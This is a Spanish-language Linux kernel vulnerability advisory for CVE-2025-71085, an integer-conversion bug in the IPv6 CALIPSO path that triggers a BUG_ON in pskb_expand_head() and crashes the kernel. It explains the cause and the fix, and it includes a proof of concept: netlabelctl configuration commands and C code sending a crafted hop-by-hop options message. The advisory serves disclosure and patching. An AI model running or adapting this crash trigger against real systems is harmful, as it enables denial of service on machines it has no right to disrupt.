Vulnerabilidad en Linux (CVE-2025-71085)

En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:<br /> <br /> ipv6: BUG() en pskb_expand_head() como parte de calipso_skbuff_setattr()<br /> <br /> Existe un oops del kernel causado por un BUG_ON(nhead &amp;lt; 0) en net/core/skbuff.c:2232 en pskb_expand_head(). Este error se activa como parte de la rutina calipso_skbuff_setattr() cuando a skb_cow() se le pasa un headroom &amp;gt; INT_MAX (es decir, (int)(skb_headroom(skb) + len_delta) &amp;lt; 0).<br /> <br /> La causa raíz del error se debe a una conversión implícita de entero en __skb_cow(). La comprobación (headroom &amp;gt; skb_headroom(skb)) tiene como objetivo asegurar que delta = headroom - skb_headroom(skb) nunca sea negativo, de lo contrario, activaremos un BUG_ON en pskb_expand_head(). Sin embargo, si headroom &amp;gt; INT_MAX y delta &amp;lt;= -NET_SKB_PAD, la comprobación pasa, delta se vuelve negativo y a pskb_expand_head() se le pasa un valor negativo para nhead.<br /> <br /> Corregir la condición de activación en calipso_skbuff_setattr(). Evitar pasar tamaños de &amp;#39;headroom&amp;#39; &amp;#39;negativos&amp;#39; a skb_cow() dentro de calipso_skbuff_setattr() utilizando únicamente skb_cow() para aumentar el headroom.<br /> <br /> PoC:<br /> Usando la herramienta &amp;#39;netlabelctl&amp;#39;:<br /> <br /> netlabelctl map del default<br /> netlabelctl calipso add pass doi:7<br /> netlabelctl map add default address:0::1/128 protocol:calipso,7<br /> <br /> Luego ejecute el siguiente PoC:<br /> <br /> int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);<br /> <br /> // setup msghdr<br /> int cmsg_size = 2;<br /> int cmsg_len = 0x60;<br /> struct msghdr msg;<br /> struct sockaddr_in6 dest_addr;<br /> struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,<br /> sizeof(struct cmsghdr) + cmsg_len);<br /> msg.msg_name = &amp;amp;dest_addr;<br /> msg.msg_namelen = sizeof(dest_addr);<br /> msg.msg_iov = NULL;<br /> msg.msg_iovlen = 0;<br /> msg.msg_control = cmsg;<br /> msg.msg_controllen = cmsg_len;<br /> msg.msg_flags = 0;<br /> <br /> // setup sockaddr<br /> dest_addr.sin6_family = AF_INET6;<br /> dest_addr.sin6_port = htons(31337);<br /> dest_addr.sin6_flowinfo = htonl(31337);<br /> dest_addr.sin6_addr = in6addr_loopback;<br /> dest_addr.sin6_scope_id = 31337;<br /> <br /> // setup cmsghdr<br /> cmsg-&amp;gt;cmsg_len = cmsg_len;<br /> cmsg-&amp;gt;cmsg_level = IPPROTO_IPV6;<br /> cmsg-&amp;gt;cmsg_type = IPV6_HOPOPTS;<br /> char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);<br /> hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80<br /> <br /> sendmsg(fd, &amp;amp;msg, 0);